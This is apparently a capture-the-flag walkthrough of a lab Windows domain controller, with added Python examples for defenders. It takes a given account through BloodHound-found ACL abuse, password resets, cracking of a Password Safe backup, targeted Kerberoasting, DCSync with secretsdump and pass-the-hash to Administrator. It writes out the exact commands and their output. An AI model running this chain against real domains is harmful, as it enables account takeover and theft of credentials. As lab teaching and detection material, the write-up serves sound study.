Administrator is a Medium difficulty Windows machine.
Machine Information
As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich
┌──(glmx㉿kali)-[~]
└─$ nmap -sC -sV 10.10.11.42 -T4 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 02:17 WIB
Nmap scan report for 10.10.11.42
Host is up (0.067s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-28 02:02:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h45m03s
| smb2-time:
| date: 2024-12-28T02:02:52
|_ start_date: N/A
Trying to log in to FTP as anonymous and with the credentials provided for this machine, but both attempts fail.
┌──(glmx㉿kali)-[~]
└─$ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:glmx): anonymous
331 Password required
Password:
530 User cannot log in.
ftp: Login failed
┌──(glmx㉿kali)-[~]
└─$ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:glmx): olivia
331 Password required
Password:
530 User cannot log in, home directory inaccessible.
ftp: Login failed
┌──(glmx㉿kali)-[~]
└─$ sudo netexec smb 10.10.11.42 -u 'olivia' -p 'ichliebedich' --shares
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\olivia:ichliebedich
SMB 10.10.11.42 445 DC [+] Enumerated shares
SMB 10.10.11.42 445 DC Share Permissions Remark
SMB 10.10.11.42 445 DC ----- ----------- ------
SMB 10.10.11.42 445 DC ADMIN$ Remote Admin
SMB 10.10.11.42 445 DC C$ Default share
SMB 10.10.11.42 445 DC IPC$ READ Remote IPC
SMB 10.10.11.42 445 DC NETLOGON READ Logon server share
SMB 10.10.11.42 445 DC SYSVOL READ Logon server share
┌──(glmx㉿kali)-[~]
└─$ sudo netexec winrm 10.10.11.42 -u 'olivia' -p 'ichliebedich'
SMB 10.10.11.42 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.10.11.42 5985 DC [*] http://10.10.11.42:5985/wsman
WINRM 10.10.11.42 5985 DC [+] administrator.htb\olivia:ichliebedich (Pwn3d!)
┌──(glmx㉿kali)-[~]
└─$ evil-winrm -i 10.10.11.42 -u 'olivia' -p 'ichliebedich'
*Evil-WinRM* PS C:\Users\olivia\Documents> ls
Directory: C:\Users\olivia\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/27/2024 3:15 PM 795 revshell.ps1
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\olivia\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator alexander benjamin
emily emma ethan
Guest krbtgt michael
olivia
The command completed with one or more errors.
Enumerate Active Directory with olivia's credentials, collecting information about access rights and the relationships between users, groups, and objects in AD. The collected data is then analyzed in BloodHound to find privilege escalation paths or other potential weaknesses in Active Directory.
┌──(glmx㉿kali)-[~]
└─$ netexec ldap 10.10.11.42 -u olivia -p ichliebedich --bloodhound --collection All --dns-server 10.10.11.42
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.42 389 DC [+] administrator.htb\olivia:ichliebedich
LDAP 10.10.11.42 389 DC Resolved collection methods: psremote, objectprops, group, session, rdp, trusts, localadmin, dcom, acl, container
LDAP 10.10.11.42 389 DC Done in 00M 12S
LDAP 10.10.11.42 389 DC Compressing output into /home/glmx/.nxc/logs/DC_10.10.11.42_2024-12-28_114533_bloodhound.zip
Upload "DC_10.10.11.42_2024-12-28_114533_bloodhound.zip" into BloodHound -> search for user olivia.
User Olivia has First Degree Object Control (FDOC) GenericAll over user Michael, meaning olivia has full control over the michael account.
With that right, michael's password can be changed from olivia's session using net user:
*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael <mike_pass> /domain
The command completed successfully.
Check the result of the password change for user michael:
┌──(glmx㉿kali)-[~]
└─$ sudo netexec smb 10.10.11.42 -u 'michael' -p '<mike_pass>'
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\michael:<mike_pass>
User Michael, in turn, has FDOC ForceChangePassword over user Benjamin, so benjamin's password can be reset through michael.
rpcclient: manages Windows systems remotely over the SMB or RPC protocol.
setuserinfo2: updates user account information, such as the name, description, or other settings, on a Windows system or in Active Directory.
*but it requires administrative rights (which michael already holds over benjamin)
┌──(glmx㉿kali)-[~]
└─$ rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 '<benja_pass>'
rpcclient $> exit
┌──(glmx㉿kali)-[~]
└─$ netexec smb 10.10.11.42 -u 'benjamin' -p '<benja_pass>'
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\benjamin:<benja_pass>
Now try benjamin's credentials to log in to FTP. The login succeeds and a psafe3 file is found, which is then downloaded to the local machine.
┌──(glmx㉿kali)-[~]
└─$ ftp 10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
Name (10.10.11.42:glmx): benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>
ftp> dir
229 Entering Extended Passive Mode (|||56318|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||56321|)
125 Data connection already open; Transfer starting.
100% |****************************************************************************************************************| 952 12.07 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (7.26 KiB/s)
ftp>
What is psafe3?
https://www.pwsafe.org
To open the file in Password Safe and view the passwords it holds, its master password first has to be recovered with Hashcat (I run Hashcat on Windows). The relevant modes:
9000: Password Safe v2
5200: Password Safe v3
PS C:\Users\gmt94\Desktop\hashcat-6.2.6> .\hashcat.exe -m 5200 C:\Users\gmt94\Desktop\Backup.psafe3 .\rockyou.txt
C:\Users\gmt94\Desktop\Backup.psafe3:te*****o
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5200 (Password Safe v3)
Hash.Target......: C:\Users\gmt94\Desktop\Backup.psafe3
Time.Started.....: Sat Dec 28 12:47:21 2024 (2 secs)
Time.Estimated...: Sat Dec 28 12:47:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
...
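What hashcat mode 5200 is actually checking: a Password Safe v3 file starts with a header holding a salt, an iteration count and SHA-256 of the stretched master key, so each wordlist guess is stretched and compared against that hash. The following is an added example, not code from the writeup or from the Password Safe project; it follows the published PWS3 layout (TAG, 32-byte SALT, 4-byte little-endian ITER, 32-byte H(P')) and constructs a sample header from a deliberately weak password.

```python
"""Password Safe v3 header check (added example; not the writeup's code and not
Password Safe's own implementation).  Follows the published PWS3 layout:
TAG 'PWS3' | SALT (32) | ITER (4, little-endian) | H(P') (32) | B1..B4, IV ...
where P' is the stretched key and H(P') = SHA-256(P').  The sample header at the
bottom is constructed here from a deliberately weak password."""
import hashlib
import hmac
import struct

TAG = b"PWS3"
MIN_ITER = 2048                     # the format's minimum for ITER

def stretch_key(password, salt, iterations):
    """P' = SHA-256 iterated `iterations` times over SHA-256(password || salt)."""
    x = hashlib.sha256(password.encode("utf-8") + salt).digest()
    for _ in range(iterations):
        x = hashlib.sha256(x).digest()
    return x

def build_header(password, salt, iterations):
    """Only the fields needed for password verification (B1..B4 and IV omitted)."""
    hp = hashlib.sha256(stretch_key(password, salt, iterations)).digest()
    return TAG + salt + struct.pack("<I", iterations) + hp

def parse_header(blob):
    """Split a PWS3 header into (salt, iterations, H(P'))."""
    if blob[:4] != TAG:
        raise ValueError("not a PWS3 file")
    salt = blob[4:36]
    iterations = struct.unpack("<I", blob[36:40])[0]
    hp = blob[40:72]
    return salt, iterations, hp

def verify_master_password(blob, candidate):
    """The comparison hashcat -m 5200 performs for each wordlist entry."""
    salt, iterations, hp = parse_header(blob)
    guess = hashlib.sha256(stretch_key(candidate, salt, iterations)).digest()
    return hmac.compare_digest(guess, hp)

def is_weakly_stretched(blob, floor=MIN_ITER):
    """Defender check: flag safes whose ITER is below `floor`."""
    return parse_header(blob)[1] < floor

# Constructed sample: fixed salt so the result is reproducible.
SAMPLE_SALT = bytes(range(32))
SAMPLE_HEADER = build_header("password123", SAMPLE_SALT, MIN_ITER)

if __name__ == "__main__":
    print("iterations:", parse_header(SAMPLE_HEADER)[1])
    print("password123 ->", verify_master_password(SAMPLE_HEADER, "password123"))
    print("letmein     ->", verify_master_password(SAMPLE_HEADER, "letmein"))
```

Each guess costs only ITER SHA-256 calls (2048 at the minimum), which is cheap on a GPU; that is why the backup above fell to rockyou in two seconds. A higher ITER raises the cost only linearly, so the strength of the master password is what protects a safe that ends up on a readable FTP share.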
After opening it, there are 3 credentials, belonging to users emma, alexander, and emily.
From the BloodHound results, only emily has an FDOC that grants GenericWrite over Ethan.
More interestingly, Ethan's FDOC includes DCSync on the Domain Controller. With DCSync, dumping every password from the domain controller becomes possible.
Before getting there, first find a way into user Ethan..
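The chains BloodHound surfaced here (GenericAll, ForceChangePassword, GenericWrite, DCSync) are the kind of thing a defender should be able to enumerate from an ACL export without clicking through a graph. The script below is an added example, not code from the writeup or from BloodHound: a small breadth-first search over an edge list constructed by hand from the relationships described above, using BloodHound's edge names. It reports every principal from which a takeover chain reaches the domain object.

```python
"""Toy BloodHound-style ACL path finder (added example, not from the writeup
or from BloodHound itself).  The edge list is constructed by hand from the
relationships described above; right names follow BloodHound's edge kinds."""
from collections import deque

# Edge kinds that let the holder take over the target (or, on a domain object,
# replicate its secrets).  The ones used in this writeup plus the usual suspects
# a defender should audit.
TAKEOVER_RIGHTS = {
    "GenericAll", "GenericWrite", "ForceChangePassword",
    "WriteDacl", "WriteOwner", "AllExtendedRights", "DCSync",
}

# Constructed edges: (holder, right, target).  The last one is not a takeover
# right and is dropped by build_graph(); the group name is a placeholder.
EDGES = [
    ("OLIVIA", "GenericAll", "MICHAEL"),
    ("MICHAEL", "ForceChangePassword", "BENJAMIN"),
    ("EMILY", "GenericWrite", "ETHAN"),
    ("ETHAN", "DCSync", "ADMINISTRATOR.HTB"),
    ("BENJAMIN", "MemberOf", "PLACEHOLDER-GROUP"),
]

def build_graph(edges):
    """Adjacency list that keeps only takeover rights."""
    graph = {}
    for holder, right, target in edges:
        if right in TAKEOVER_RIGHTS:
            graph.setdefault(holder, []).append((right, target))
    return graph

def find_paths(graph, start, goal):
    """All simple paths start -> goal, each a list of (holder, right, target)."""
    paths = []
    queue = deque([(start, [])])
    while queue:
        node, path = queue.popleft()
        if node == goal and path:
            paths.append(path)
            continue
        visited = {start} | {t for _, _, t in path}
        for right, nxt in graph.get(node, []):
            if nxt not in visited:
                queue.append((nxt, path + [(node, right, nxt)]))
    return paths

def principals_with_dcsync_path(graph, domain):
    """Every principal from which a takeover chain reaches the domain object."""
    return sorted(p for p in graph if find_paths(graph, p, domain))

def describe(path):
    """Render a path as 'A -(Right)-> B -(Right)-> C'."""
    return path[0][0] + "".join(f" -({r})-> {t}" for _, r, t in path)

if __name__ == "__main__":
    g = build_graph(EDGES)
    for p in principals_with_dcsync_path(g, "ADMINISTRATOR.HTB"):
        for path in find_paths(g, p, "ADMINISTRATOR.HTB"):
            print(describe(path))
```

Note that olivia does not reach the domain object through ACLs alone: the olivia -> michael -> benjamin chain ends at an FTP share, and the jump to emily happens through a credential found in a file rather than through a directory right. That is exactly the kind of hop an ACL-only audit misses, and why share permissions and backup hygiene belong in the same review.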
emily cred: UXLCI5*******
Verify emily's password:
┌──(glmx㉿kali)-[~]
└─$ netexec smb 10.10.11.42 -u emily -p UXLCI5***
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\emily:UXLCI5***
┌──(glmx㉿kali)-[~]
└─$ netexec winrm 10.10.11.42 -u emily -p UXLCI5***
WINRM 10.10.11.42 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM 10.10.11.42 5985 DC [+] administrator.htb\emily:UXLCI5*** (Pwn3d!)
Kerberoasting
Kerberoasting is an attack technique that abuses a Kerberos feature in Active Directory. The attacker uses an account that has an SPN (Service Principal Name) to request a Kerberos service ticket (TGS - Ticket Granting Service). That ticket is encrypted with the service account's password hash, so the hash can be cracked offline to recover the credentials. The requirement is that the target must have a registered SPN.
In this case the target user (ethan) has no SPN, so user Emily, who holds GenericWrite over him, is used to create an SPN, request the ticket, and crack the hash to obtain the password.
When starting, it failed because the target machine's clock and mine were out of sync 😂
ERROR: [!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Problem solved 😁
Continue..
Check the date:
*Evil-WinRM* PS C:\Users\emily\Documents> Get-Date
Saturday, December 28, 2024 5:20:27 AM
┌──(glmx㉿kali)-[~]
└─$ date +"%I:%M:%S %p %d-%m-%Y"
01:35:31 PM 28-12-2024
Change the date:
┌──(glmx㉿kali)-[~]
└─$ sudo timedatectl set-ntp off
┌──(glmx㉿kali)-[~]
└─$ sudo rdate -n 10.10.11.42
Sat Dec 28 20:22:37 WIB 2024
Once the time is synchronized, start the Kerberoasting again:
└─$ ./targetedKerberoast.py -d administrator.htb -u emily -p UXLCI5***
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e45ae302babcc****
(Got the krb5tgs hash)
Crack the hash with hashcat.
Successfully cracked the Kerberos TGS (Ticket Granting Service) hash, which uses etype 23, i.e. Kerberos 5 TGS-REP with RC4-HMAC (hashcat mode 13100).
PS C:\Users\gmt94\Desktop\hashcat-6.2.6> .\hashcat.exe -m 13100 -O .\ethan_krb5t .\rockyou.txt
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e45ae302babc**************
8dcec879a314e16e812332f13e:<password>
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....32f13e
Time.Started.....: Sat Dec 28 13:47:37 2024 (0 secs)
Time.Estimated...: Sat Dec 28 13:47:37 2024 (0 secs)
Kernel.Feature...: Optimized Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
....
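Two defender-side checks for the step above, as an added example that is not part of the writeup: `parse_krb5tgs` reads the header of a hashcat `$krb5tgs$` line and reports the encryption type the ticket used (etype 23 is RC4-HMAC, which is what makes an instant crack against rockyou possible), and `rc4_service_ticket_requests` scans Windows Security event 4769 records for RC4 service tickets issued for user accounts, a standard Kerberoasting indicator. The 4769 records and the client IP in them are constructed; field names follow the event's schema. The hash sample is the truncated prefix printed above.

```python
"""Kerberoasting indicators (added example; not from the writeup).  Two parts:
parse_krb5tgs() reads the header of a hashcat $krb5tgs$ line to report the
ticket's encryption type, and rc4_service_ticket_requests() scans Security
event 4769 records for RC4 service tickets issued for user accounts.  The 4769
records below are constructed; field names follow the event's XML schema."""
import re

ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96",
               18: "aes256-cts-hmac-sha1-96",
               23: "rc4-hmac"}

# hashcat 13100 layout for etype 23: $krb5tgs$23$*user$REALM$spn*$checksum$edata2
_ETYPE_RE = re.compile(r"^\$krb5tgs\$(\d+)\$")
_RC4_RE = re.compile(r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$")

def parse_krb5tgs(line):
    """Report etype and, for the etype-23 layout, user/realm/SPN."""
    m = _ETYPE_RE.match(line)
    if not m:
        raise ValueError("not a $krb5tgs$ line")
    etype = int(m.group(1))
    info = {"etype": etype,
            "etype_name": ETYPE_NAMES.get(etype, "unknown"),
            "rc4": etype == 23}
    r = _RC4_RE.match(line)
    if r:  # AES lines ($17$/$18$) order the fields differently; only etype is reported
        info.update(user=r.group(1), realm=r.group(2), spn=r.group(3))
    return info

def rc4_service_ticket_requests(events):
    """(requester, service) pairs for 4769 events where an RC4 (0x17) ticket was
    issued for a user service account (machine accounts and krbtgt excluded)."""
    hits = []
    for e in events:
        if e.get("EventID") != 4769:
            continue
        if int(e["TicketEncryptionType"], 16) != 0x17:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        hits.append((e["TargetUserName"], svc))
    return hits

# Truncated prefix as printed in the writeup.
SAMPLE_HASH = "$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$e45ae302babcc"

# Constructed 4769/4768 records; the IpAddress values are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "ethan",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.200"},
    {"EventID": 4769, "TargetUserName": "olivia@ADMINISTRATOR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.200"},
    {"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.200"},
    {"EventID": 4768, "TargetUserName": "emily@ADMINISTRATOR.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.200"},
]

if __name__ == "__main__":
    print(parse_krb5tgs(SAMPLE_HASH))
    print(rc4_service_ticket_requests(SAMPLE_EVENTS))
```

For the targeted variant used here the earlier signal is the directory change itself: a non-administrative account writing servicePrincipalName on another user (event 5136 with that attribute, when object auditing is enabled) precedes the 4769. Removing RC4 from the service account's msDS-SupportedEncryptionTypes turns the ticket into an AES hash, which does not crack in 0 seconds.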
As noted earlier in the finding about user Ethan, this user has DCSync, which makes it possible to dump the passwords held by the domain controller.
┌──(glmx㉿kali)-[~/TOOLS/targetedKerberoast]
└─$ impacket-secretsdump administrator.htb/ethan:<ethan_pass>@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:a*****e:3*******e:::
...
┌──(glmx㉿kali)-[~/TOOLS/targetedKerberoast]
└─$ evil-winrm -i 10.10.11.42 -u 'Administrator' -H '3***e'
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator
Got the user & root flags ^_^